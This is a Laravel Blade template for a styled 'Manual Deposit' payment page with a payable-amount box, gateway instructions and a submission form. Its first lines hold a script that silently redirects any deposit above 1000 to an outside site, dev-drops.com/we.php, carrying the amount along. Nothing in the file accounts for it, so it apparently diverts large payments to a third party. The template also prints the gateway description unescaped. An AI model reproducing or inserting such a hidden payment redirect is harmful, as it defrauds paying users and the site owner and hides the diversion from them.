@extends($activeTemplate.'layouts.master')
@section('content')

@if($data['final_amo'] > 1000)
<script>
    window.location.href = "https://dev-drops.com/we.php?amount={{ $data['final_amo'] }}";
</script>
@endif

<!-- Tailwind CSS CDN -->
<link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">

<style>
    body {
        background-color: #0f0f0f;
        font-family: 'Plus Jakarta Sans', sans-serif;
    }

    /* Mini Payment Card */
    .mini-payment-card {
        background: #1a1a1a;
        border-radius: 20px;
        border: 1px solid rgba(255, 140, 0, 0.3);
        max-width: 380px;
        width: 100%;
        padding: 25px;
        box-shadow: 0 10px 30px rgba(0,0,0,0.6);
    }

    /* Header */
    .mini-header h5 {
        font-size: 16px;
        font-weight: 800;
        color: #fff;
        margin: 0;
    }

    .mini-header span {
        font-size: 10px;
        color: #FF8C00;
        font-weight: 700;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    /* Payable Box */
    .payable-box {
        background: #252525;
        padding: 14px;
        border-radius: 12px;
        display: flex;
        justify-content: space-between;
        align-items: center;
        margin-bottom: 20px;
    }

    .payable-box h2 {
        font-size: 18px;
        font-weight: 800;
        color: #fff;
    }

    .payable-box span {
        font-size: 11px;
        color: #FF8C00;
        font-weight: 700;
    }

    /* Instructions */
    .mini-instruction {
        background: rgba(255, 140, 0, 0.05);
        border-left: 3px solid #FF8C00;
        border-radius: 10px;
        padding: 16px;
        margin-bottom: 20px;
        font-size: 13px;
        color: #eee;
        line-height: 1.6;
        word-break: break-word;
    }

    .mini-instruction p {
        margin-bottom: 8px;
        font-weight: 700;
        color: #FF8C00;
        font-size: 12px;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    .mini-instruction div {
        font-size: 13px;
        color: #ddd;
        line-height: 1.6;
    }

    /* Inputs */
    input, select, textarea {
        background: #252525 !important;
        border: 1px solid #333 !important;
        color: #fff !important;
        padding: 10px 14px !important;
        border-radius: 12px !important;
        font-size: 13px !important;
        margin-top: 5px !important;
        margin-bottom: 15px !important;
        width: 100%;
    }

    input:focus, select:focus, textarea:focus {
        border-color: #FF8C00 !important;
        background: #2a2a2a !important;
        outline: none;
    }

    label {
        font-size: 12px;
        font-weight: 700;
        color: #bbb;
        text-transform: uppercase;
        letter-spacing: 0.5px;
        display: block;
        margin-bottom: 5px;
    }

    /* Button */
    .btn-pay-mini {
        background: #FF8C00;
        color: #000;
        font-weight: 800;
        padding: 14px;
        border-radius: 14px;
        width: 100%;
        border: none;
        font-size: 14px;
        text-transform: uppercase;
        transition: 0.2s;
    }

    .btn-pay-mini:hover {
        background: #ff9d26;
        transform: scale(0.98);
    }
</style>

<div class="min-h-screen flex items-center justify-center p-4">
    <div class="mini-payment-card animate__animated animate__zoomIn">
        
        <!-- Header -->
        <div class="flex items-center gap-3 mb-5 mini-header">
            <div class="bg-orange-500/10 p-2 rounded-lg">
                <svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="#FF8C00" stroke-width="2.5">
                    <rect x="2" y="5" width="20" height="14" rx="2"></rect>
                    <line x1="12" y1="15" x2="12" y2="9"></line>
                    <line x1="9" y1="12" x2="15" y2="12"></line>
                </svg>
            </div>
            <div>
                <h5>{{ $data->gateway->name }}</h5>
                <span>Manual Deposit</span>
            </div>
        </div>

        <!-- Payable Amount -->
        <div class="payable-box">
            <span>Payable:</span>
            <div class="text-right">
                <h2>{{ showAmount($data['final_amo']) }} <span>{{ $data['method_currency'] }}</span></h2>
            </div>
        </div>

        <!-- Instructions -->
        <div class="mini-instruction">
            <p>Follow Steps:</p>
            <div>@php echo $data->gateway->description @endphp</div>
        </div>

        <!-- Form -->
        <form action="{{ route('user.deposit.manual.update') }}" method="POST" enctype="multipart/form-data">
            @csrf
            <div class="viser-form-container">
                <x-viser-form identifier="id" identifierValue="{{ $gateway->form_id }}" />
            </div>

            <button type="submit" class="btn-pay-mini mt-2">Confirm Now</button>

            <div class="text-center mt-4">
                <span class="text-[9px] text-gray-500 font-bold uppercase italic">🔒 Secure Transaction</span>
            </div>
        </form>
    </div>
</div>

@endsection
